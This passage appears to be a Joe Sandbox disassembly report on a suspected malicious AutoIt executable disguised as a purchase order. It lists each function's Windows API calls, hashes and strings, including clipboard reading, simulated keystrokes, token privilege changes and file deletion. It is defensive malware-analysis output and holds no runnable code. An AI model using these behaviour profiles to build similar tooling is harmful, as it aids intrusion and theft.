                      • Instruction ID: e7e6aba63dc7b1ee23a6f08af43e1829c20137121d0751de74d8227c533ebdf8
                      • Opcode Fuzzy Hash: dfab3c914ab5a01d594dc6e42d7d2bdcd10fc43f0987cc32999be8bc3fb1e6db
                      • Instruction Fuzzy Hash: B6115175600601DFCB24DF28D581956BBF9FF49350720C46EE48ECB662E732E881CB50
                      APIs
                        • Part of subcall function 00A93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00A93F90
                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                        • Part of subcall function 00A93E78: FreeLibrary.KERNEL32(00000000), ref: 00A93EAB
                        • Part of subcall function 00A94010: _memmove.LIBCMT ref: 00A9405A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Library$Free$Load_memmove
                      • String ID:
                      • API String ID: 3640140200-0
                      • Opcode ID: 7f1209d1ef9f9a3ecda022b7a73e952481d55fed77e36755093c786ad3998099
                      • Instruction ID: 7827fca21c611906f8d43ef7f081d2dfbe47a036ef830d5493e319971b46eaab
                      • Opcode Fuzzy Hash: 7f1209d1ef9f9a3ecda022b7a73e952481d55fed77e36755093c786ad3998099
                      • Instruction Fuzzy Hash: F5119132710219AACF20AB64DE06FAE77F99F54704F208829F942A61C1DF749E459B50
                      APIs
                      • ___lock_fhandle.LIBCMT ref: 00ABBD73
                        • Part of subcall function 00AB886A: __getptd_noexit.LIBCMT ref: 00AB886A
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __getptd_noexit$___lock_fhandle
                      • String ID:
                      • API String ID: 1144279405-0
                      • Opcode ID: 73ee693aae27e93877d8af21084ca56ebc4f1d6b6d9edab43a3648bd4f8adc29
                      • Instruction ID: ebbcdabecdfb75c2c72810fdcdc775a6e7f4f6880c2a9bd175c84c93845dd096
                      • Opcode Fuzzy Hash: 73ee693aae27e93877d8af21084ca56ebc4f1d6b6d9edab43a3648bd4f8adc29
                      • Instruction Fuzzy Hash: 29116A728256149FD7126FA8CA463D87B68AF42332F550680E5641B2E3DFFC89408B71
                      APIs
                      • __lock_file.LIBCMT ref: 00AB377D
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2597487223-0
                      • Opcode ID: ee8191f1f78280466467df8dd166b9bd3f9192c0623dba28236fbac83e620d44
                      • Instruction ID: e11fde6bdb626cebc58a31b25b7e9b45d8caf73c367a09302d35b4959aacafc6
                      • Opcode Fuzzy Hash: ee8191f1f78280466467df8dd166b9bd3f9192c0623dba28236fbac83e620d44
                      • Instruction Fuzzy Hash: 30F096B2940215EBDF21EF748D067EE77ACAF40350F144514F4149A193DFB98B90DB91
                      APIs
                      • FreeLibrary.KERNEL32(?,?,?,?,?,00A934E2,?,00000001), ref: 00A93E6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: f19b973d55b7b3d791184e5ed87d6b2a83a142d4f09d87fb37c5042e21731ab0
                      • Instruction ID: f12de245d0a0802fb4a7aca484d0f00151287e70aabe3d12761edf68d8c02baf
                      • Opcode Fuzzy Hash: f19b973d55b7b3d791184e5ed87d6b2a83a142d4f09d87fb37c5042e21731ab0
                      • Instruction Fuzzy Hash: 91F015B6606751DFCF349F64D494852BBF6AF047193248A2EE1D682622C7319944DF00
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: e1e089ff8783a028dcdbca5aa4177b4e400280b9004c36ea8fdc66ad4f0575ad
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 6BE0BF7494420D9FDB00DFA4D54969D7BB4EF04701F100161FD0592280D63099508A62
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00AFF64E
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF6AD
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFF6EA
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF711
                      • SendMessageW.USER32 ref: 00AFF737
                      • _wcsncpy.LIBCMT ref: 00AFF7A3
                      • GetKeyState.USER32(00000011), ref: 00AFF7C4
                      • GetKeyState.USER32(00000009), ref: 00AFF7D1
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF7E7
                      • GetKeyState.USER32(00000010), ref: 00AFF7F1
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF820
                      • SendMessageW.USER32 ref: 00AFF843
                      • SendMessageW.USER32(?,00001030,?,00AFDE69), ref: 00AFF940
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00AFF956
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AFF967
                      • SetCapture.USER32(?), ref: 00AFF970
                      • ClientToScreen.USER32(?,?), ref: 00AFF9D4
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AFF9E0
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00AFF9FA
                      • ReleaseCapture.USER32 ref: 00AFFA05
                      • GetCursorPos.USER32(?), ref: 00AFFA3A
                      • ScreenToClient.USER32(?,?), ref: 00AFFA47
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFAA9
                      • SendMessageW.USER32 ref: 00AFFAD3
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFB12
                      • SendMessageW.USER32 ref: 00AFFB3D
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AFFB55
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AFFB60
                      • GetCursorPos.USER32(?), ref: 00AFFB81
                      • ScreenToClient.USER32(?,?), ref: 00AFFB8E
                      • GetParent.USER32(?), ref: 00AFFBAA
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFC10
                      • SendMessageW.USER32 ref: 00AFFC40
                      • ClientToScreen.USER32(?,?), ref: 00AFFC96
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AFFCC2
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFCEA
                      • SendMessageW.USER32 ref: 00AFFD0D
                      • ClientToScreen.USER32(?,?), ref: 00AFFD57
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AFFD87
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFFE1C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F
                      • API String ID: 2516578528-4164748364
                      • Opcode ID: 2bb4f5b427a0a5136f6219820cf4b4f36bb5e30e75a1451ec0a7ad8d06b11b8a
                      • Instruction ID: 0df5e306ad6e5dbfba7058098c860b69a8b00d15fa49a666187f4d52f9ad6e91
                      • Opcode Fuzzy Hash: 2bb4f5b427a0a5136f6219820cf4b4f36bb5e30e75a1451ec0a7ad8d06b11b8a
                      • Instruction Fuzzy Hash: 8C329971204249AFDB60DFA8C884ABABBE5BF48358F144A69F695C72B1DB31DC04CB51
                      APIs
                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AFAFDB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: %d/%02d/%02d
                      • API String ID: 3850602802-328681919
                      • Opcode ID: 913991eefe13b29060213cffd5158a402a38559db355056abb691f445f0a12e1
                      • Instruction ID: 609777e4d54445439488a9beb1d5ef74367312d5abc2e503c4697acf5166bbed
                      • Opcode Fuzzy Hash: 913991eefe13b29060213cffd5158a402a38559db355056abb691f445f0a12e1
                      • Instruction Fuzzy Hash: 2812B0B1500218ABEB259FA8CD89FFEBBB8EF55350F108259F619DB2D1DB708941CB11
                      APIs
                      • GetForegroundWindow.USER32(00000000,00000000), ref: 00AAF796
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B04388
                      • IsIconic.USER32(000000FF), ref: 00B04391
                      • ShowWindow.USER32(000000FF,00000009), ref: 00B0439E
                      • SetForegroundWindow.USER32(000000FF), ref: 00B043A8
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B043BE
                      • GetCurrentThreadId.KERNEL32 ref: 00B043C5
                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B043D1
                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043E2
                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043EA
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B043F2
                      • SetForegroundWindow.USER32(000000FF), ref: 00B043F5
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0440A
                      • keybd_event.USER32(00000012,00000000), ref: 00B04415
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0441F
                      • keybd_event.USER32(00000012,00000000), ref: 00B04424
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0442D
                      • keybd_event.USER32(00000012,00000000), ref: 00B04432
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0443C
                      • keybd_event.USER32(00000012,00000000), ref: 00B04441
                      • SetForegroundWindow.USER32(000000FF), ref: 00B04444
                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B0446B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                      • Instruction ID: 2d1a782e988c28bfca2bac885cd34e033e805112be966af278ccbb859459f280
                      • Opcode Fuzzy Hash: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                      • Instruction Fuzzy Hash: 4A3176B1A40218BFEB215B719C49FBF7EADEB44B50F518065FB05E71D1CBB05D01AAA0
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00B522E8,?,00000000,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?), ref: 00A9BE8B
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?,00000002), ref: 00A9BEA7
                      • __wsplitpath.LIBCMT ref: 00A9BF19
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcscpy.LIBCMT ref: 00A9BF31
                      • _wcscat.LIBCMT ref: 00A9BF46
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A9BF56
                      • _wcscpy.LIBCMT ref: 00A9C03E
                      • _wcscpy.LIBCMT ref: 00A9C1ED
                      • SetCurrentDirectoryW.KERNEL32 ref: 00A9C250
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                        • Part of subcall function 00A9C320: _memmove.LIBCMT ref: 00A9C419
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                      • API String ID: 2542276039-689609797
                      • Opcode ID: 7de5dfb15542450c9f9e60c820c5bc45306a077317ee02e3ebabff99b52f0ef0
                      • Instruction ID: 35bbb3459e633bf7a3d3205d7574314882eddf2d98698cb49670999aa002243e
                      • Opcode Fuzzy Hash: 7de5dfb15542450c9f9e60c820c5bc45306a077317ee02e3ebabff99b52f0ef0
                      • Instruction Fuzzy Hash: 0C42B4716083419FCB10EF60D945BEBB7E8AF94310F04492DF58687292EB31EA49CB93
                      APIs
                        • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                        • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                        • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                      • _memset.LIBCMT ref: 00ACBA34
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ACBA86
                      • CloseHandle.KERNEL32(?), ref: 00ACBA97
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ACBAAE
                      • GetProcessWindowStation.USER32 ref: 00ACBAC7
                      • SetProcessWindowStation.USER32(00000000), ref: 00ACBAD1
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ACBAEB
                        • Part of subcall function 00ACB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ACB9EC), ref: 00ACB8C5
                        • Part of subcall function 00ACB8B0: CloseHandle.KERNEL32(?,?,00ACB9EC), ref: 00ACB8D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                      • String ID: $default$winsta0
                      • API String ID: 2063423040-1027155976
                      • Opcode ID: 8ede6f1702c6be6665d71cff0fcb8b462c5fbb9a52b886d490084a985af1aab8
                      • Instruction ID: abb6183ecf8f46fc221a0bd135178e23c83986eb2e00540522eb9238213b2a08
                      • Opcode Fuzzy Hash: 8ede6f1702c6be6665d71cff0fcb8b462c5fbb9a52b886d490084a985af1aab8
                      • Instruction Fuzzy Hash: 9D815771910208AFDF11DFA4CD46EEEBBB8EF08304F158559F915A62A1DB328E14EB21
                      APIs
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                        • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BBC
                        • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BCF
                        • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                      • _wcscat.LIBCMT ref: 00AD6B9D
                      • _wcscat.LIBCMT ref: 00AD6BBB
                      • __wsplitpath.LIBCMT ref: 00AD6BE2
                      • FindFirstFileW.KERNEL32(?,?), ref: 00AD6BF8
                      • _wcscpy.LIBCMT ref: 00AD6C57
                      • _wcscat.LIBCMT ref: 00AD6C6A
                      • _wcscat.LIBCMT ref: 00AD6C7D
                      • lstrcmpiW.KERNEL32(?,?), ref: 00AD6CAB
                      • DeleteFileW.KERNEL32(?), ref: 00AD6CBC
                      • MoveFileW.KERNEL32(?,?), ref: 00AD6CDB
                      • MoveFileW.KERNEL32(?,?), ref: 00AD6CEA
                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00AD6CFF
                      • DeleteFileW.KERNEL32(?), ref: 00AD6D10
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6D37
                      • FindClose.KERNEL32(00000000), ref: 00AD6D53
                      • FindClose.KERNEL32(00000000), ref: 00AD6D61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                      • String ID: \*.*
                      • API String ID: 1867810238-1173974218
                      • Opcode ID: 902db575d01b9e229450fb8298f3b162399f0327cc700b74e89be836c6a8f128
                      • Instruction ID: 59aa6018f2bfab1e28abb5c3a7cb85b5e9539738d225ef7a8eb3a38953775abc
                      • Opcode Fuzzy Hash: 902db575d01b9e229450fb8298f3b162399f0327cc700b74e89be836c6a8f128
                      • Instruction Fuzzy Hash: C9512E7290416CAACF21EBA0DD84EEE77BDAF09300F4445D7E55AA3141EB349B88CF61
                      APIs
                      • OpenClipboard.USER32(00B2DBF0), ref: 00AE70C3
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AE70D1
                      • GetClipboardData.USER32(0000000D), ref: 00AE70D9
                      • CloseClipboard.USER32 ref: 00AE70E5
                      • GlobalLock.KERNEL32(00000000), ref: 00AE7101
                      • CloseClipboard.USER32 ref: 00AE710B
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AE7120
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00AE712D
                      • GetClipboardData.USER32(00000001), ref: 00AE7135
                      • GlobalLock.KERNEL32(00000000), ref: 00AE7142
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AE7176
                      • CloseClipboard.USER32 ref: 00AE7283
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                      • String ID:
                      • API String ID: 3222323430-0
                      • Opcode ID: cd373461e3b934fe31be99e5ffcab27677d50cf702e951a8cfd5a915f4cd54e1
                      • Instruction ID: aa91d5ae53409cdc6c0b3f521751c0e372170369b8f95bb4c41029444cb1b083
                      • Opcode Fuzzy Hash: cd373461e3b934fe31be99e5ffcab27677d50cf702e951a8cfd5a915f4cd54e1
                      • Instruction Fuzzy Hash: 4351C031308341ABD711EB65DD9AFAE77E8AF84B01F808619F646D72E1DF70D9048B62
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ADFE03
                      • FindClose.KERNEL32(00000000), ref: 00ADFE57
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ADFE7C
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ADFE93
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ADFEBA
                      • __swprintf.LIBCMT ref: 00ADFF06
                      • __swprintf.LIBCMT ref: 00ADFF3F
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • __swprintf.LIBCMT ref: 00ADFF93
                        • Part of subcall function 00AB234B: __woutput_l.LIBCMT ref: 00AB23A4
                      • __swprintf.LIBCMT ref: 00ADFFE1
                      • __swprintf.LIBCMT ref: 00AE0030
                      • __swprintf.LIBCMT ref: 00AE007F
                      • __swprintf.LIBCMT ref: 00AE00CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 108614129-2428617273
                      • Opcode ID: 82ac06b533d3293fedf722362d2b0680ad96358255155d54f65fe1486f717d65
                      • Instruction ID: 4d2ec96668ab45ea1c3b49d7e2e78d58eabb8711183f69dc266d27e1f843cf02
                      • Opcode Fuzzy Hash: 82ac06b533d3293fedf722362d2b0680ad96358255155d54f65fe1486f717d65
                      • Instruction Fuzzy Hash: 8BA13FB2508344ABC700EBA4C985EAFB7EDBF95700F44491EF595C7191EB34EA48CB62
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00AE2065
                      • _wcscmp.LIBCMT ref: 00AE207A
                      • _wcscmp.LIBCMT ref: 00AE2091
                      • GetFileAttributesW.KERNEL32(?), ref: 00AE20A3
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00AE20BD
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AE20D5
                      • FindClose.KERNEL32(00000000), ref: 00AE20E0
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE20FC
                      • _wcscmp.LIBCMT ref: 00AE2123
                      • _wcscmp.LIBCMT ref: 00AE213A
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE214C
                      • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE216A
